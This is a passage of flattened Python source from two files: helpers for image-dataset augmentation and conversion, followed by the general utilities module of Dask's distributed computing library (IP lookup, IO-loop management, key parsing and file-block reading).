(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
utils.py
|
import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = parse_timedelta(callback_timeout, "s")
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
# We flag the thread state asynchronous, which will make sync() call
# within `func` use async semantic. In order to support concurrent
# calls to sync(), `asynchronous` is used as a ref counter.
thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
thread_state.asynchronous += 1
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
assert thread_state.asynchronous > 0
thread_state.asynchronous -= 1
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
>>> key_split_group('x-1')
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
asyncio.get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
@functools.lru_cache(None)
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
>>> [8787]
or a string:
>>> parse_ports("8787")
>>> [8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
>>> [8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
>>> [None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
""" A container for logs """
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
""" A container for multiple logs """
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
